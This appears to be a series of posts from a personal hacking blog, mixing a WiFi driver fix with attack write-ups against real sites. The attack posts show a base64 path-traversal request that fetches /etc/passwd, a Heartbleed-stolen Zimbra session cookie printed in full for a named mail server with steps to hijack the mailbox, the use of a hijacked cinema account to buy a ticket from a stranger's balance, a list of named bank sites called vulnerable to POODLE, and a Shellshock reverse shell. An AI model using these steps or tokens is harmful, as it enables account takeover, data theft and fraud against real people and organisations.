While browsing i found this cool remote file download vulnerability. :)

http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true

If i open link above, it will download a file for me. Now see the path and file parameter. It's base64 encrypt.

path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==

Decrypt both value and i got this.


path=system/modules/berita/files/download/
file=presentation_final.ppt

Now i know the path and the file name. What if i change it? Let see.

path=L2V0Yy8=
file=cGFzc3dk

I changed the path value with /etc/ and file value with passwd. Encrypt it to base64 first.

http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true

This modified link will download passwd file from the system.



Thats it.. :)


*some link and value in this PoC has been cencored/changed coz this is a live website.
*admin is notified by email



Well this is an old vulnerablity called Heartbleed (CVE-2014-0160). Let's exploit this.

Run the Heartbleed exploit and you'll get the Zimbra cookie.


See the Referer and Cookie? Use that to login.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site in firefox who have installed Cookie Injector plugin https://mx.tempo.co.id/ and press alt+c to show the Cookie Injector.


You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should have popup screen "All Cookie Have Been Written".


Refresh (F5) the site again and you are now login to user email.


Type password on search box and hit enter... :p



./NoGe

Hi, it's been a while since my last post.. :)



21 Cineplex is one of the largest group of cinema in Indonesia (Cinema 21, Cinema XXI and The Premiere). In this post i wanna show you guys how i buy ticket using other people account on 21 Cineplex website. Well this is an old vulnerability but they never fix it so let's have some fun. :p

Start with find user cookies and referer link.



I will use this cookies and referer link. Open the referer link in browser.



As we can see on the left side, i don't have access to this account. Now use the user cookies.
I'm using Cookie Injector to write cookies.




Copy and paste user cookies to Cookie Injector than click OK and we'll have this screen below. This means user cookies is written successfully.



Now reopen the referer link. I will automatically login to the user page.



Let's buy a ticket with this account. The account balance is Rp. 165.000.
I wanna watch Inferno :)



Select city, cinema, date, time and how many ticket that we want to buy. Click CONTINUE, select seat and click BUY NOW.




Transaction process.



And i have my free ticket.. :)
I also have the transaction code 11636 to pick up the ticket.



As we can see now the user balance is Rp. 104.000.




Thats it for today. I have movie to watch. :p



Stay safe! Stay cool! :)

 

Hi all..

I'm using HP ProBook with Kubuntu 14.04 but my WiFi keep dropping connection.
I have to reboot laptop to connect WiFi again.

I use this command to fix my WiFi problem and it's working fine.


echo "options rtl8723be fwlps=N ips=N" | sudo tee /etc/modprobe.d/rtl8723be.conf
Anyway my chipset is Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter.

This setting can be different depens on your chipset.
To see your chipset, you can use this command.

lspci

I hope this can usefull for you to!



./NoGe


Here is some Indonesian Bank that still vulnerable to Poodle attack.
I'm using SSL/TLS Security Test by High-Tech Bridge and manual scan using nmap.

>> https://iperson.bankjatim.co.id

SSL/TLS Security Test


Script scan nmap



>> https://netbank.jtrustbank.co.id

SSL/TLS Security Test


Script scan nmap



>> https://cib.qnb.co.id

SSL/TLS Security Test


Script scan nmap



>> https://www.tunaiku.amarbank.co.id

SSL/TLS Security Test


Script scan nmap



>> https://www.nobuwwwbanking.com

SSL/TLS Security Test


Script scan nmap


Happy hunting guys!

Updated.
Some bank has been notified about this vulnerability.


./NoGe

Based on thatchrisecker. exploit at Exploit-DB.
I run this exploit on Cisco UCS Manager version 2.1(3e) and it's successfully reverse a bash shell.


Run the netcut on my machine


Run the Cisco UCS Manager Shellshock Exploit


Bash shell on Cisco UCS Manager Machine





Happy hunting guys! :)



./NoGe

This bug found by Michael "Artsploit" Stepankin. It's been reported and fixed by PayPal.







Full Proof of Concept go here.





./NoGe